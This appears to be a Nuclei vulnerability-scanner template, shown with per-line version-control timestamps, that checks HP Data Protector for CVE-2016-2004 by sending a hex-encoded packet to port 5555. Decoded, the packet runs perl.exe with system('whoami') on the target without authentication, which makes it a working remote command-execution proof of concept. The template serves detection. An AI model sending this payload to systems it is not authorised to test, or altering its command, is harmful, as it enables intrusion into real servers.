2021-08-18 11:37:49 +00:00
id : CVE-2016-2004
info :
2022-05-11 07:58:51 +00:00
name : HP Data Protector - Arbitrary Command Execution
2021-08-18 11:37:49 +00:00
author : pussycat0x
severity : critical
description : HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
2022-05-17 09:18:12 +00:00
- http://www.kb.cert.org/vuls/id/267328
- https://www.exploit-db.com/exploits/39858/
2023-07-16 13:29:08 +00:00
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
2023-09-27 13:29:58 +00:00
remediation : |
Upgrade to the most recent version of HP Data Protector.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-2004
cwe-id : CWE-306
2023-07-16 13:29:08 +00:00
cpe : cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
2023-09-27 13:29:58 +00:00
epss-score : 0.06793
2023-04-28 08:11:21 +00:00
metadata :
2023-09-27 13:29:58 +00:00
max-request : 1
2023-07-16 13:29:08 +00:00
product : data_protector
2023-09-27 13:29:58 +00:00
vendor : hp
2023-07-16 13:29:08 +00:00
tags : cve,cve2016,network,iot,hp,rce,edb
2023-04-27 04:28:59 +00:00
tcp :
2023-07-16 13:29:08 +00:00
- host :
2021-08-18 11:37:49 +00:00
- "{{Hostname}}"
2023-09-16 19:35:21 +00:00
port : 5555
2023-07-16 13:29:08 +00:00
inputs :
- data : "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
type : hex
2021-08-18 11:37:49 +00:00
matchers :
- type : word
encoding : hex
words :
- "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
2023-10-19 13:13:52 +00:00
# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950